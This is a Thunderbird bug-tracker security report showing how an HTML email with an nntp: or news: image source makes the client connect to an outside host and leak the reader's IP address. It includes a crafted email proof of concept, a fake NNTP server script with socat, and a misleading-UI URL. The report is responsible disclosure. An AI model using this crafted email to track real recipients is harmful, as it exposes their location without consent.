Closed
Bug 1212138
Opened 9 years ago
Closed 9 years ago
Information leakage using <img src> with news or nntp URI scheme
Categories
(Thunderbird :: Security, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 968342
People
(Reporter: a, Unassigned)
Details
(Keywords: privacy, reporter-external, sec-moderate)
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150511103303
Steps to reproduce:
Opened a crafted HTML email such as the following:
From alech@alech.invalid Sun Mar 6 16:11:05 2011
To: alech@alech.invalid
From: Alexander Klink <alech@alech.invalid>
Subject: nntp url leaking
Message-ID: <56141D44.4000209@test.invalid>
Date: Tue, 6 Oct 2015 21:13:08 +0200
Content-Type: text/html
<img src="nntp://0x90.eu/foo/123">
Alternatively, news://0x90.eu works, too. (news://0x90.eu/foo/123 pops up a dialog asking whether I want to subscribe to foo).
Actual results:
Thunderbird creates an NNTP connection to 0x90.eu, thus leaking the user's IP address (which is prevented when using HTTP).
On 0x90.eu, I created a fake NNTP server using
# cat nntp.sh
#!/bin/sh
/bin/echo -e "500 wombatvax news server ready - posting ok\r"
read line
# socat -v -D TCP-LISTEN:nntp,fork,reuseaddr,ip-pktinfo EXEC:./nntp.sh
In the socat output, it can be seen that Thunderbird connects to the server and then sends a QUIT command:
< 2015/10/07 00:53:36.859143 length=46 from=0 to=45
500 wombatvax news server ready - posting ok\r
> 2015/10/07 00:53:36.989454 length=6 from=0 to=5
QUIT\r
Expected results:
Thunderbird should not have created a TCP connection without the user's consent (similar to the "remote image loading" dialog, when HTTP is used for the same purpose).
Reporter | ||
Comment 1•9 years ago
|
||
In addition, for every such host, a new news server is automatically created in the GUI, which would allow attackers to put information in the GUI until the user realizes how to delete news servers ...
Reporter | ||
Comment 2•9 years ago
|
||
I just verified it also on the nightly (44.0a1, 2015-10-06).
Reporter | ||
Comment 3•9 years ago
|
||
The snews: URI scheme is also affected.
Updated•9 years ago
|
Flags: sec-bounty?
Reporter | ||
Comment 4•9 years ago
|
||
For some confusing UI choices, try
nntp://n:119/our%20premium%20Thunderbird%20support%20program%3F%20%28only%20%249.99%2Fmonth%29
:-)
Comment 5•9 years ago
|
||
Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block these? Can you confirm this?
Flags: needinfo?(vseerror)
Keywords: privacy,
sec-moderate
Comment 6•9 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #5)
> Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> these? Can you confirm this?
Joshua or Kent probably know
Flags: needinfo?(vseerror) → needinfo?(rkent)
Reporter | ||
Comment 7•9 years ago
|
||
I didn't verify exactly where in the code this is not blocked, but nsMsgContentPolicy has a list of "exposed protocols", quote:
* Determines if the content location is a scheme that we're willing to expose
* for unlimited loading of content.
cf.
http://hg.mozilla.org/comm-central/file/fb83f130e2d5/mailnews/base/src/nsMsgContentPolicy.cpp#l384
and around.
The list is the following: mailto, news, snews, nntp, imap, addbook, pop, mailbox, about. I couldn't manage to get any connections using imap or pop, I assume the other ones are unable to make remote connections, anyways.
Comment 8•9 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #5)
> Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> these? Can you confirm this?
In some sense, they're necessary, since we rewrite cid: links in files to the message URL + some extra query parameters.
This is a dupe of at least bug 968342, and I think there's another one, but I'm not finding that one right now.
Comment 9•9 years ago
|
||
I should add that the type of a news://server/group check should be something like application/x-message-newsgroup, which should prevent it from being usable as a subdocument resource.
Although bug 108203 would probably preempt any sort of leak here, to the extent that anything can be prevented (note that URLs like <news://news.mozilla.org/mozilla.dev.apps.thunderbird> or the article format are perfectly valid URLs that we'd want to handle if someone clicks on them in a webpage).
Reporter | ||
Comment 10•9 years ago
|
||
I don't really see how bug 108203 would prevent anything there, can you elaborate please? Also, this is not about clicking on it (which I'd consider a perfectly valid non-information-leaky use case), but use in an image source. Has anyone tried my original test case?
Comment 11•9 years ago
|
||
Sorry that should be bug 108293. (The irony is that the typo still refers to an NNTP bug).
Fundamentally, the code paths that go through an image source versus clicking on something are remarkably similar--you're requesting a URL load in the backend either way.
Reporter | ||
Comment 12•9 years ago
|
||
Ah, OK, 10829 makes more sense :-).
Well, for privacy reasons, I still believe this load should not happen in the first place. I assume most Thunderbird users have no idea what NNTP and newsgroups actually are ... Also, as mentioned in comment 4, the UI doesn't even mention newsgroups in some cases, making it potentially even more confusing for users.
Reporter | ||
Comment 14•9 years ago
|
||
It's been ten days without contact. Any infos on how you plan to resolve this?
Reporter | ||
Comment 15•9 years ago
|
||
It's been nearly two months since the original report, any plans on resolving this bug?
Comment 16•9 years ago
|
||
(In reply to Joshua Cranmer [:jcranmer] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #5)
> > Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> > these? Can you confirm this?
>
> In some sense, they're necessary, since we rewrite cid: links in files to
> the message URL + some extra query parameters.
>
> This is a dupe of at least bug 968342, and I think there's another one, but
> I'm not finding that one right now.
Are you thinking of bug 968334 ?
Reasonable to dup to bug 968342?
Flags: needinfo?(Pidgeot18)
Updated•9 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Comment 18•9 years ago
|
||
(In reply to Wayne Mery (:wsmwk, use Needinfo for questions) from comment #16)
> Reasonable to dup to bug 968342?
Yep, although it's already been done. :-)
Flags: needinfo?(Pidgeot18)
Updated•9 years ago
|
Flags: sec-bounty? → sec-bounty+
Updated•6 years ago
|
Group: mail-core-security
Updated•6 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•